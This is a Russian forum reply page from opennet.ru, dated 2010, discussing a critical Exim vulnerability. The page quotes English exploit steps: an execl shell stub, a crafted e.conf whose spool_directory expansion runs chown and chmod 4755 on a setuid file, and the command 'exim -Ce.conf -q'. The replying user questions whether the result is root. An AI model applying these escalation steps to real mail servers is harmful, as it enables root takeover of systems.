forum.opennet.ru

Составление сообщения

Исходное сообщение

"В Exim обнаружена критическая уязвимость, позволяющая получи..."
Отправлено pvg, 09-Дек-10 22:32

>after that attacker gets shell with id of user Debian-exim and cwd
>in /var/spool/exim4
?then it put file there file setuid with trivial execution of root shell:
>[оверквотинг удален]
>execl("/bin/sh", "sh", NULL);
>}
>
>and create another file e.conf with following content:
>spool_directory = ${run{/bin/chown
>root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4>/setuid}}
>the he runs:
>exim -Ce.conf -q
>and gets suid bit on /var/spool/exim4/setuid
>everything else is trivial.
suid да но от exim , а не от root
я

Исходное сообщение
"В Exim обнаружена критическая уязвимость, позволяющая получи..." Отправлено pvg, 09-Дек-10 22:32
>after that attacker gets shell with id of user Debian-exim and cwd >in /var/spool/exim4 ?then it put file there file setuid with trivial execution of root shell: >[оверквотинг удален] >execl("/bin/sh", "sh", NULL); >} > >and create another file e.conf with following content: >spool_directory = ${run{/bin/chown >root:root /var/spool/exim4/setuid}}${run{/bin/chmod 4755 /var/spool/exim4>/setuid}} >the he runs: >exim -Ce.conf -q >and gets suid bit on /var/spool/exim4/setuid >everything else is trivial. suid да но от exim , а не от root я

Ваше сообщение

Имя*:

EMail:

Для отправки ответов на email укажите знак ! перед адресом, например, !user@host.ru (!! - не показывать email).
Более тонкая настройка отправки ответов производится в профиле зарегистрированного участника форума.

Заголовок*:

Сообщение*:

При общении не допускается: неуважительное отношение к собеседнику, хамство, унизительное обращение, ненормативная лексика, переход на личности, агрессивное поведение, обесценивание собеседника, провоцирование флейма голословными и заведомо ложными заявлениями. Не отвечайте на сообщения, явно нарушающие правила - удаляются не только сами нарушения, но и все ответы на них. Лог модерирования.

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру